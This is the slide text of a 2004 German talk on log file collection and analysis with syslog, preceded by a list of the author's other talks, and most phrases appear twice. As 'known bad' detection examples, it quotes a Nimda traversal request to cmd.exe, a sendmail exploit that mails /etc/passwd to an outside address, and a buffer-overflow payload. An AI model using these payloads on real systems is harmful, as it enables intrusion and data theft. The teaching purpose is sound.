Using Wildcards with rsyslog's File Monitor imfileUsing Wildcards with rsyslog's File Monitor imfile
Using Wildcards with rsyslog's File Monitor imfileRainer Gerhards
 
Fedora Developer's Conference 2014 Talk
Fedora Developer's Conference 2014 TalkFedora Developer's Conference 2014 Talk
Fedora Developer's Conference 2014 TalkRainer Gerhards
 
The rsyslog v8 engine (developer's view)
The rsyslog v8 engine (developer's view)The rsyslog v8 engine (developer's view)
The rsyslog v8 engine (developer's view)Rainer Gerhards
 
Writing External Rsyslog Plugins
Writing External Rsyslog PluginsWriting External Rsyslog Plugins
Writing External Rsyslog PluginsRainer Gerhards
 
Wetterbeobachtung - Ein Vortrag für die Grundschule
Wetterbeobachtung - Ein Vortrag für die GrundschuleWetterbeobachtung - Ein Vortrag für die Grundschule
Wetterbeobachtung - Ein Vortrag für die GrundschuleRainer Gerhards
 
Rsyslog vs Systemd Journal Presentation
Rsyslog vs Systemd Journal PresentationRsyslog vs Systemd Journal Presentation
Rsyslog vs Systemd Journal PresentationRainer Gerhards
 
Rsyslog vs Systemd Journal (Paper)
Rsyslog vs Systemd Journal (Paper)Rsyslog vs Systemd Journal (Paper)
Rsyslog vs Systemd Journal (Paper)Rainer Gerhards
 
CEE Log Integrity and the "Counterpane Paper"
CEE Log Integrity and the "Counterpane Paper"CEE Log Integrity and the "Counterpane Paper"
CEE Log Integrity and the "Counterpane Paper"Rainer Gerhards
 
Status of syslog as of 2005
Status of syslog as of 2005Status of syslog as of 2005
Status of syslog as of 2005Rainer Gerhards
 
Rsyslog log normalization
Rsyslog log normalizationRsyslog log normalization
Rsyslog log normalizationRainer Gerhards
 

Mais de Rainer Gerhards (13)

Sicherheit im Internet - Wie kann man sich schützen?
Sicherheit im Internet - Wie kann man sich schützen?Sicherheit im Internet - Wie kann man sich schützen?
Sicherheit im Internet - Wie kann man sich schützen?
 
rsyslog meets docker
rsyslog meets dockerrsyslog meets docker
rsyslog meets docker
 
Using Wildcards with rsyslog's File Monitor imfile
Using Wildcards with rsyslog's File Monitor imfileUsing Wildcards with rsyslog's File Monitor imfile
Using Wildcards with rsyslog's File Monitor imfile
 
Fedora Developer's Conference 2014 Talk
Fedora Developer's Conference 2014 TalkFedora Developer's Conference 2014 Talk
Fedora Developer's Conference 2014 Talk
 
The rsyslog v8 engine (developer's view)
The rsyslog v8 engine (developer's view)The rsyslog v8 engine (developer's view)
The rsyslog v8 engine (developer's view)
 
Writing External Rsyslog Plugins
Writing External Rsyslog PluginsWriting External Rsyslog Plugins
Writing External Rsyslog Plugins
 
Wetterbeobachtung - Ein Vortrag für die Grundschule
Wetterbeobachtung - Ein Vortrag für die GrundschuleWetterbeobachtung - Ein Vortrag für die Grundschule
Wetterbeobachtung - Ein Vortrag für die Grundschule
 
Rsyslog vs Systemd Journal Presentation
Rsyslog vs Systemd Journal PresentationRsyslog vs Systemd Journal Presentation
Rsyslog vs Systemd Journal Presentation
 
Rsyslog vs Systemd Journal (Paper)
Rsyslog vs Systemd Journal (Paper)Rsyslog vs Systemd Journal (Paper)
Rsyslog vs Systemd Journal (Paper)
 
CEE Log Integrity and the "Counterpane Paper"
CEE Log Integrity and the "Counterpane Paper"CEE Log Integrity and the "Counterpane Paper"
CEE Log Integrity and the "Counterpane Paper"
 
State of syslog (2005)
State of syslog (2005)State of syslog (2005)
State of syslog (2005)
 
Status of syslog as of 2005
Status of syslog as of 2005Status of syslog as of 2005
Status of syslog as of 2005
 
Rsyslog log normalization
Rsyslog log normalizationRsyslog log normalization
Rsyslog log normalization
 

LogFile Auswertung (log analysis)

  • 1. Copyright © 2004 Adiscon GmbH www.adiscon.com Logfile AuswertungLogfile Auswertung „Getting it there and getting„Getting it there and getting something out of it...“something out of it...“ Rainer GerhardsRainer Gerhards AdisconAdiscon
  • 2. Copyright © 2004 Adiscon GmbH www.adiscon.com Worum es geht...Worum es geht...  SammlungSammlung undund AuswertungAuswertung vonvon System-ProtokolldateienSystem-Protokolldateien • NutzenNutzen • MöglichkeitenMöglichkeiten • SchwierigkeitenSchwierigkeiten • LösungenLösungen  DenkansätzeDenkansätze • KEINE Produktpräsentation!KEINE Produktpräsentation! • KEINE fertigen Lösungen!KEINE fertigen Lösungen!
  • 3. Copyright © 2004 Adiscon GmbH www.adiscon.com Was beinhalten Logs?Was beinhalten Logs?  Betriebsmanagement-InfosBetriebsmanagement-Infos  Securitymanagement-InfosSecuritymanagement-Infos • Benutzeran- und -abmeldungenBenutzeran- und -abmeldungen • Nachrichtenverkehr (Firewall, Router, ...)Nachrichtenverkehr (Firewall, Router, ...) • erkannte Viren/Malwareerkannte Viren/Malware • Zugriffe auf DatenobjekteZugriffe auf Datenobjekte • Ressourcenprobleme (out of space...)Ressourcenprobleme (out of space...) • und viel, viel mehr...und viel, viel mehr...
  • 4. Copyright © 2004 Adiscon GmbH www.adiscon.com Nutzen von LogsNutzen von Logs  KapazitätsplanungenKapazitätsplanungen  FehleranalyseFehleranalyse  (Realzeit-)Alarmierung(Realzeit-)Alarmierung  BeweissicherungBeweissicherung  Forensische AnalyseForensische Analyse  (Interne) Auditierung(Interne) Auditierung  Achtung!Achtung! • DatenschutzDatenschutz • Mitbestimmungsrechte BetriebsratMitbestimmungsrechte Betriebsrat
  • 5. Copyright © 2004 Adiscon GmbH www.adiscon.com „„getting it there...“getting it there...“  Logs liegen auf einzelnen GerätenLogs liegen auf einzelnen Geräten  es muss zentralisiert werden, umes muss zentralisiert werden, um Gesamtbild zu erhaltenGesamtbild zu erhalten  Herstellerlösungen decken oft nurHerstellerlösungen decken oft nur einen Teilbereich abeinen Teilbereich ab
  • 6. Copyright © 2004 Adiscon GmbH www.adiscon.com LogquellenLogquellen  Geräte (Router, Firewall) mit syslogGeräte (Router, Firewall) mit syslog  *NIX syslog*NIX syslog  Windows Event LogsWindows Event Logs  TextdateienTextdateien  DatenbanktabellenDatenbanktabellen  serielle Geräteserielle Geräte  ......
  • 7. Copyright © 2004 Adiscon GmbH www.adiscon.com Zugang zu Log-QuellenZugang zu Log-Quellen  je nach Systemje nach System • unterschiedlicher Zugriffunterschiedlicher Zugriff • unterschiedliches Meldungsformatunterschiedliches Meldungsformat • unterschiedliche Aussagekraftunterschiedliche Aussagekraft  Selbst gleiche Geräte, inSelbst gleiche Geräte, in unterschiedlichen Releases, erzeugenunterschiedlichen Releases, erzeugen unterschiedliche Log-Meldungenunterschiedliche Log-Meldungen  APIs in hohem Maße inkompatibelAPIs in hohem Maße inkompatibel
  • 8. Copyright © 2004 Adiscon GmbH www.adiscon.com Lösung - syslogLösung - syslog  syslog ist kleinste gemeinsame Untermengesyslog ist kleinste gemeinsame Untermenge  ursprünglich entstanden im Umfeld vonursprünglich entstanden im Umfeld von sendmailsendmail  de-facto Standard (späte „Standardisierung“de-facto Standard (späte „Standardisierung“ bisher nur über einen informational RFC)bisher nur über einen informational RFC)  extrem einfach zu implementieren (undextrem einfach zu implementieren (und daher sehr große Unterstützung)daher sehr große Unterstützung)  sollte eine Logquelle kein syslogsollte eine Logquelle kein syslog unterstützen, gibt es bestimmt einenunterstützen, gibt es bestimmt einen Konverter dafür (z.B. EventReporter fürKonverter dafür (z.B. EventReporter für Windows Event Log)Windows Event Log)  syslog ist in der Praxis erprobt und bewährtsyslog ist in der Praxis erprobt und bewährt
  • 9. Copyright © 2004 Adiscon GmbH www.adiscon.com syslog: formatsyslog: format  kurze Textmeldung (< 1024 byte)kurze Textmeldung (< 1024 byte)  Übermittlung via UDP (ungesichert)Übermittlung via UDP (ungesichert)  Facility/Severity: Numerische WerteFacility/Severity: Numerische Werte für Filterungfür Filterung  KEINE Spezifikation des TextteilesKEINE Spezifikation des Textteiles (anders als z.B. SNMP)(anders als z.B. SNMP) <38>Nov 12 15:11:26 su(pam_unix)[2246]: session opened for user root by rger(uid=500)
  • 10. Copyright © 2004 Adiscon GmbH www.adiscon.com syslog: Der Meldungsinhalt...syslog: Der Meldungsinhalt...  leidiges Problemleidiges Problem  keine Standardisierung in Sichtkeine Standardisierung in Sicht  jeder Entwickler schickt, was er fürjeder Entwickler schickt, was er für richtig hält – und in dem Format, inrichtig hält – und in dem Format, in dem er es für richtig hält...dem er es für richtig hält...  Nachbearbeitung der MeldungenNachbearbeitung der Meldungen erforderlicherforderlich  verschiedene Analysetoolsverschiedene Analysetools
  • 11. Copyright © 2004 Adiscon GmbH www.adiscon.com syslog: Bittere Pillen...syslog: Bittere Pillen...  Probleme aus der PraxisProbleme aus der Praxis • MeldungsverlusteMeldungsverluste • einfach zu fälscheneinfach zu fälschen • einfach mitzuleseneinfach mitzulesen  Fortentwicklung des ProtokollsFortentwicklung des Protokolls • IETF Arbeitsgruppe seit ca. 2000IETF Arbeitsgruppe seit ca. 2000 • syslog-protocol - neues Format, Layerssyslog-protocol - neues Format, Layers • syslog-sign - Signaturensyslog-sign - Signaturen • RFC 3195 (syslog-reliable) – sichere undRFC 3195 (syslog-reliable) – sichere und verschlüsselte Übertragungverschlüsselte Übertragung  Für viele Probleme finden sich Lösungen –Für viele Probleme finden sich Lösungen – man muss nur nachdenken...man muss nur nachdenken...
  • 12. Copyright © 2004 Adiscon GmbH www.adiscon.com Aufbau der Log-InfrastrukturAufbau der Log-Infrastruktur  TypischTypisch • Systeme so konfigurieren, dass auch tatsächlichSysteme so konfigurieren, dass auch tatsächlich relevanterelevante Logs erzeugt werdenLogs erzeugt werden • Lieferung der Logdaten an ein zentrales SystemLieferung der Logdaten an ein zentrales System • evtl. (Near)-RealTime Alertingevtl. (Near)-RealTime Alerting • Auswertung auf dem zentralen SystemAuswertung auf dem zentralen System  je nach Aufgabenstellung natürlich gänzlichje nach Aufgabenstellung natürlich gänzlich verschiedene Strukturenverschiedene Strukturen • DatenschutzDatenschutz • Beweissicherung / AuditierungBeweissicherung / Auditierung
  • 13. Copyright © 2004 Adiscon GmbH www.adiscon.com Beispiel: Relay-ArchitekturBeispiel: Relay-Architektur
  • 14. Copyright © 2004 Adiscon GmbH www.adiscon.com Speicherung der LogdateienSpeicherung der Logdateien  DatenbankenDatenbanken • einfache Abfrageeinfache Abfrage • für große Logmengen ungeeignetfür große Logmengen ungeeignet (Durchsatz)(Durchsatz)  TextdateienTextdateien • sehr viel besserer Durchsatzsehr viel besserer Durchsatz • von vielen Tools unterstütztvon vielen Tools unterstützt • in der interaktiven Analyse problematischin der interaktiven Analyse problematisch  Gespeicherte Logs müssen besondersGespeicherte Logs müssen besonders gegen Manipulation geschützt werden!gegen Manipulation geschützt werden!
  • 15. Copyright © 2004 Adiscon GmbH www.adiscon.com „„getting something out of it...“getting something out of it...“ The common item to look for whenThe common item to look for when reviewing log files is anything thatreviewing log files is anything that appears out of the ordinary.appears out of the ordinary. CERT Coordination CenterCERT Coordination Center Intrusion Detection ChecklistIntrusion Detection Checklist
  • 16. Copyright © 2004 Adiscon GmbH www.adiscon.com Einige Auswertungsverfahren...Einige Auswertungsverfahren...  Basierend auf SignaturenBasierend auf Signaturen • kown badkown bad • „„artificial ignorance“ (Marcus Ranum)artificial ignorance“ (Marcus Ranum)  Basierend auf StatistikenBasierend auf Statistiken  „„Never before seen“Never before seen“
  • 17. Copyright © 2004 Adiscon GmbH www.adiscon.com Known BadKnown Bad  vergleichbar Virensignaturdateienvergleichbar Virensignaturdateien  bekannte Muster von Attackenbekannte Muster von Attacken  besondere Problematik: je nachbesondere Problematik: je nach meldendem System/Version könnenmeldendem System/Version können die Signaturen unterschiedlich seindie Signaturen unterschiedlich sein
  • 18. Copyright © 2004 Adiscon GmbH www.adiscon.com Beispiele „Known Bad“ IBeispiele „Known Bad“ I  Nimda:Nimda: 204.120.69.195 - - [18/Sep/2001:09:35:19204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%-0500] "GET /scripts/..% %35%63../winnt/system32 /cmd.exe?/c+dir%35%63../winnt/system32 /cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"HTTP/1.0" 400 215 "-" "-"  Sendmail Exploits:Sendmail Exploits: Jul 21 01:25:49 ariel sendmail[308]:Jul 21 01:25:49 ariel sendmail[308]: BAA00307: to=lamarbroc@delphi.com,BAA00307: to=lamarbroc@delphi.com, ctladdr=":/bin/mail root@ariel.sdsc.eductladdr=":/bin/mail root@ariel.sdsc.edu </etc/passwd", delay=00:00:34, mailer=smtp,</etc/passwd", delay=00:00:34, mailer=smtp, relay=bos1h.delphi.com. (192.80.63.8),relay=bos1h.delphi.com. (192.80.63.8), stat=Sent (Ok.)stat=Sent (Ok.)
  • 19. Copyright © 2004 Adiscon GmbH www.adiscon.com Beispiele „Known Bad“ IIBeispiele „Known Bad“ II  Buffer Overflows:Buffer Overflows: Jan 02 16:19:45 xxx.xxx.xxx.xxx rpc.statd[351]:Jan 02 16:19:45 xxx.xxx.xxx.xxx rpc.statd[351]: gethostbyname error forgethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿bffff750^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿bffff750 804971090909090687465676274736f6d616e797265206520726f7804971090909090687465676274736f6d616e797265206520726f7 220726f66220726f66 bffff718bffff718 bffff719 bffff71abffff719 bffff71a bffff71bbffff71b     !! !!   
  • 20. Copyright © 2004 Adiscon GmbH www.adiscon.com Known Good /Known Good / Artificial IgnoranceArtificial Ignorance  bekannte Log-Einträge werdenbekannte Log-Einträge werden ausgefiltertausgefiltert  Parameter in den Einträgen erfordernParameter in den Einträgen erfordern oft spezielle Beachtungoft spezielle Beachtung  Nur die verbleibenden Einträge werdenNur die verbleibenden Einträge werden beachtetbeachtet  ACHTUNG: „Gute“ Einträge könnenACHTUNG: „Gute“ Einträge können auch von (erfolgreichen) Attackenauch von (erfolgreichen) Attacken erzeugt worden sein.erzeugt worden sein.
  • 21. Copyright © 2004 Adiscon GmbH www.adiscon.com StatistikenStatistiken  Betrachtet werdenBetrachtet werden • bestimmte Messzahlen (z.B.bestimmte Messzahlen (z.B. Verkehrsvolumen)Verkehrsvolumen) • (syslog-) Meldungsvolumen selbst(syslog-) Meldungsvolumen selbst  Vergleich von aktuellem Wert zuVergleich von aktuellem Wert zu statistischem Mittelwertstatistischem Mittelwert  Signifikante Abweichungen könnenSignifikante Abweichungen können auf ein Problem hindeutenauf ein Problem hindeuten • ABER: Feiertage können signifikanteABER: Feiertage können signifikante Abweichungen erzeugen...Abweichungen erzeugen...
  • 22. Copyright © 2004 Adiscon GmbH www.adiscon.com Never before SeenNever before Seen  Besonders beachtenswert sindBesonders beachtenswert sind • Ereignisse, die noch NIEMALS aufgetretenEreignisse, die noch NIEMALS aufgetreten sind (Marcus Ranum, loganlysis list)sind (Marcus Ranum, loganlysis list) • Ereignisse, die extrem selten auftretenEreignisse, die extrem selten auftreten (Rainer Gerhards, „Needle in Haystack“)(Rainer Gerhards, „Needle in Haystack“)  Vorsicht: Neue Software-VersionenVorsicht: Neue Software-Versionen oder Geräte können Ergebnisoder Geräte können Ergebnis temporär verfälschen!temporär verfälschen!
  • 23. Copyright © 2004 Adiscon GmbH www.adiscon.com Automatische Analyse IAutomatische Analyse I  Gefahr von „false positives“ sehr hochGefahr von „false positives“ sehr hoch  zu viel Automatik kann evtl. selbst zuzu viel Automatik kann evtl. selbst zu denial of service genutzt werden:denial of service genutzt werden: • auto-Regel (basierend auf „kown bad“)auto-Regel (basierend auf „kown bad“) schließt Firewall für IPs, von denenschließt Firewall für IPs, von denen Attacken ausgehenAttacken ausgehen • Attackierender spooft Pakete mit fremdenAttackierender spooft Pakete mit fremden IPs für einen gesamten RangeIPs für einen gesamten Range • Ergebnis: unsere Regel sperrt dieErgebnis: unsere Regel sperrt die gespooften IPs aus... autsch ;)gespooften IPs aus... autsch ;)
  • 24. Copyright © 2004 Adiscon GmbH www.adiscon.com Automatische Analyse IIAutomatische Analyse II  automatische Alarme sollten manuellautomatische Alarme sollten manuell überprüft werdenüberprüft werden  automatische Aktionen könnenautomatische Aktionen können verwendet werden, wenn diesverwendet werden, wenn dies zwingend erforderlich erscheint. Dannzwingend erforderlich erscheint. Dann müssen aber alle Konsequenzenmüssen aber alle Konsequenzen durchdacht werden!durchdacht werden!
  • 25. Copyright © 2004 Adiscon GmbH www.adiscon.com Unterstützung der manuellenUnterstützung der manuellen AnalyseAnalyse  Komprimierung und KonsolidierungKomprimierung und Konsolidierung notwendignotwendig  dem Analysierenden muss der Zugangdem Analysierenden muss der Zugang zu den Low-Level Informationenzu den Low-Level Informationen einfach möglich sein (oftmals kann nureinfach möglich sein (oftmals kann nur damit eine endgültige Entscheidungdamit eine endgültige Entscheidung gefällt werden)gefällt werden)
  • 26. Copyright © 2004 Adiscon GmbH www.adiscon.com ZusammenfassungZusammenfassung  Log-Dateien beinhalten sehr hilfreicheLog-Dateien beinhalten sehr hilfreiche InformationenInformationen  Strategie zum zentralen SammelnStrategie zum zentralen Sammeln zwingend erforderlichzwingend erforderlich  In heterogenen Umgebungen istIn heterogenen Umgebungen ist syslog oft die einzige Möglichkeit, hatsyslog oft die einzige Möglichkeit, hat aber Restriktionenaber Restriktionen  In der Analyse nicht nur aufIn der Analyse nicht nur auf Automatiken verlassen.Automatiken verlassen.
  • 27. Copyright © 2004 Adiscon GmbH www.adiscon.com Fragen?Fragen?  rgerhards@adiscon.comrgerhards@adiscon.com  www.adiscon.comwww.adiscon.com  www.monitorware.comwww.monitorware.com Adiscon GmbH Franz-Marc-Str. 144 50374 Erftstadt 0800-ADISCON (0800/2347266) info@adiscon.com
  • 28. Copyright © 2004 Adiscon GmbH www.adiscon.com Weitere Interessante LinksWeitere Interessante Links  www.loganalysis.orgwww.loganalysis.org  www.sans.orgwww.sans.org  http://www.dshield.com/http://www.dshield.com/  www.syslog.cc/ietf/www.syslog.cc/ietf/  http://www.ietf.org/html.charters/syslohttp://www.ietf.org/html.charters/syslo g-charter.htmlg-charter.html  http://www.monitorware.com/en/workihttp://www.monitorware.com/en/worki nprogress/nature-of-syslog-data.phpnprogress/nature-of-syslog-data.php  http://www.monitorware.com/en/workihttp://www.monitorware.com/en/worki nprogress/Needle-in-Haystack.phpnprogress/Needle-in-Haystack.php
  • 29. Copyright © 2004 Adiscon GmbH www.adiscon.com DanksagungDanksagung  Der Autor möchte sich insbesondereDer Autor möchte sich insbesondere bei Dr. Tina Bird vonbei Dr. Tina Bird von www.loganalysis.org für diewww.loganalysis.org für die Überlassung einiger Beispiele ausÜberlassung einiger Beispiele aus Ihrem Loganalyse-Seminar bedanken.Ihrem Loganalyse-Seminar bedanken.